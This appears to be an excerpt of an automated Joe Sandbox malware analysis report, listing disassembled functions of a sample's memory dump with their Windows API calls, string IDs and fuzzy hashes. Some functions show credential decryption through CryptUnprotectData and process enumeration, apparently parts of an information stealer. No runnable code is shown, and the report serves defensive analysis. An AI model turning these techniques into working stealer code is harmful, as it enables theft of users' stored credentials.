                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID: wwww
                                  • API String ID: 3317088062-671953474
                                  • Opcode ID: 53a0fbac2aad63ff9462a1332e213cf31128938e88eb1f4fbb0251e33b5001c7
                                  • Instruction ID: 24342ec4847d69925c0091aff4aeb657c0460ef7a059e4bc691f2eeaa4fa1092
                                  • Opcode Fuzzy Hash: 53a0fbac2aad63ff9462a1332e213cf31128938e88eb1f4fbb0251e33b5001c7
                                  • Instruction Fuzzy Hash: 96012BB1A04614ABC71D8F58DC4EFAEB76DEB84721F004329F916D73C0D7B419048AD1
                                  Function 00321B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00321B72
                                    • Part of subcall function 00321820: lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0032184F
                                    • Part of subcall function 00321820: lstrlen.KERNEL32(01016108), ref: 00321860
                                    • Part of subcall function 00321820: lstrcpy.KERNEL32(00000000,00000000), ref: 00321887
                                    • Part of subcall function 00321820: lstrcat.KERNEL32(00000000,00000000), ref: 00321892
                                    • Part of subcall function 00321820: lstrcpy.KERNEL32(00000000,00000000), ref: 003218C1
                                    • Part of subcall function 00321820: lstrlen.KERNEL32(00334FA0), ref: 003218D3
                                    • Part of subcall function 00321820: lstrcpy.KERNEL32(00000000,00000000), ref: 003218F4
                                    • Part of subcall function 00321820: lstrcat.KERNEL32(00000000,00334FA0), ref: 00321900
                                    • Part of subcall function 00321820: lstrcpy.KERNEL32(00000000,00000000), ref: 0032192F
                                  • sscanf.NTDLL ref: 00321B9A
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00321BB6
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00321BC6
                                  • ExitProcess.KERNEL32 ref: 00321BE3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 3040284667-0
                                  • Opcode ID: 672f8f785a20acb613d34028727f053e0b573fd319e2a79a8435a758dfc30681
                                  • Instruction ID: 4f1dfee85151c0744542f72d4de2acd3d6fe8df6ae6c0a39aa73316bf537387c
                                  • Opcode Fuzzy Hash: 672f8f785a20acb613d34028727f053e0b573fd319e2a79a8435a758dfc30681
                                  • Instruction Fuzzy Hash: 3221F3B5518301AF8354DF69D88585FBBF8FFE8214F409A1EF599C3220E770D5088BA2
                                  Function 00307750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0030775E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00307765
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0030778D
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003077AD
                                  • LocalFree.KERNEL32(?), ref: 003077B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 66bed1059188f3936d6c1ca9a7bcf0f18e7ab709a9ffa67d10ab8968d73a2221
                                  • Instruction ID: bea81bb67a106b0434550624b922a8b1d61f12ce0bcfb518266f0b8785aa9090
                                  • Opcode Fuzzy Hash: 66bed1059188f3936d6c1ca9a7bcf0f18e7ab709a9ffa67d10ab8968d73a2221
                                  • Instruction Fuzzy Hash: EA011EB5B44318BBEB14DB949C4AFAA7B78EB44B11F104155FA09EA3C0D6B0A904CB90
                                  Function 006B18C9 Relevance: 6.7, Strings: 4, Instructions: 1671COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ZD$r]f_$uO${I=v
                                  • API String ID: 0-2912207845
                                  • Opcode ID: addd2528f0cd6280123be8f736571e9b697cd323bc0780aa0f61f89a8cda4026
                                  • Instruction ID: bb04fb5a2f0bd05ab2d3831216764cdfa00647447e3d2cbbd294637131524d57
                                  • Opcode Fuzzy Hash: addd2528f0cd6280123be8f736571e9b697cd323bc0780aa0f61f89a8cda4026
                                  • Instruction Fuzzy Hash: 02B229B36082009FE304AE2DEC8567ABBE6EFD4720F1A893DE5C4C7744EA3558458797
                                  Function 00323A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003271FE
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00323A96
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00323AA9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00323ABF
                                    • Part of subcall function 00327310: lstrlen.KERNEL32(------,00305BEB), ref: 0032731B
                                    • Part of subcall function 00327310: lstrcpy.KERNEL32(00000000), ref: 0032733F
                                    • Part of subcall function 00327310: lstrcat.KERNEL32(?,------), ref: 00327349
                                    • Part of subcall function 00327280: lstrcpy.KERNEL32(00000000), ref: 003272AE
                                  • CloseHandle.KERNEL32(00000000), ref: 00323BF7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 69e8c3b6694a9279934646b44e21e127e40e4bacd2511bcdfb1a78ffa9534430
                                  • Instruction ID: bb242ee6e33da63eddef4bcab73970ed570cbe6894068bf436a9f1c1054cbb36
                                  • Opcode Fuzzy Hash: 69e8c3b6694a9279934646b44e21e127e40e4bacd2511bcdfb1a78ffa9534430
                                  • Instruction Fuzzy Hash: 3B81F770905224CFC716CF18E988B95B7F1FB44315F2AC1A9D409AB3A2D77A9D86DF80
                                  Function 0030EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0030EA76
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0030EA7E
                                  • lstrcat.KERNEL32(0032CFEC,0032CFEC), ref: 0030EB27
                                  • lstrcat.KERNEL32(0032CFEC,0032CFEC), ref: 0030EB49
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 37348523eb4365834da2c8be4bf70a5bf57849962e9e25ccb07c4946718a44ad
                                  • Instruction ID: b359381142f62e957d604d314c41b6329d96a7005793bc6e658c6d5d06543f57
                                  • Opcode Fuzzy Hash: 37348523eb4365834da2c8be4bf70a5bf57849962e9e25ccb07c4946718a44ad
                                  • Instruction Fuzzy Hash: B131E476B14219ABDB11CB98EC49FEEB77DDF44705F0041A5FA09E2280DBB05A08CBA1
                                  Function 003240B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 003240CD
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 003240DC
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003240E3
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00324113
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptHeapString$AllocateProcess
                                  • String ID:
                                  • API String ID: 3825993179-0
                                  • Opcode ID: e337bb687666b56ebf2bfea6dc1528b9a8de99518ea02ebdbd2352621dba3cb9
                                  • Instruction ID: 4a18dabf81eaee91e9c8929f74b6bc826ed770915653d33533cabe4b547e6a41
                                  • Opcode Fuzzy Hash: e337bb687666b56ebf2bfea6dc1528b9a8de99518ea02ebdbd2352621dba3cb9
                                  • Instruction Fuzzy Hash: 59017CB0600215BBDB14CFA5EC89BAABBADEF94311F108059FE09C7340DA71D980DBA0
                                  Function 00309B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00309B3B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00309B4A
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00309B61
                                  • LocalFree.KERNEL32 ref: 00309B70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: c61ec63bdb5c7d5223737e730d2f99737acc406a3461561bcd7c7c1a2fb02237
                                  • Instruction ID: 3e399db7674c482023ebdbe15564cb98bfcca2aff13fae1f27273af501f9f575
                                  • Opcode Fuzzy Hash: c61ec63bdb5c7d5223737e730d2f99737acc406a3461561bcd7c7c1a2fb02237
                                  • Instruction Fuzzy Hash: 00F01DB03453126BE7311F65AC59F577BA8EF14B60F210115FA45EA3D0D7B09844CAA4
                                  Function 006C2735 Relevance: 5.3, Strings: 3, Instructions: 1568COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: J|o$cLFm$p*'d
                                  • API String ID: 0-2978934763
                                  • Opcode ID: 401fee6e648d2d69052b180d3a8e4a516ab921ab679cd846720f9b921f16cddb
                                  • Instruction ID: 5520cbafd6d85ef8b860e8e3deb3330bc6ab2edd406dbeb538260d1ebf3937d1
                                  • Opcode Fuzzy Hash: 401fee6e648d2d69052b180d3a8e4a516ab921ab679cd846720f9b921f16cddb
                                  • Instruction Fuzzy Hash: 2DB2D4F350C6009FE308AF29EC8567ABBE5EF94720F16492DE6C5C3744E63598418B97
                                  Function 0031CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(0032B110,00000000,00000001,0032B100,?), ref: 0031CB06
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0031CB46
                                  • lstrcpyn.KERNEL32(?,?,00000104), ref: 0031CBC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
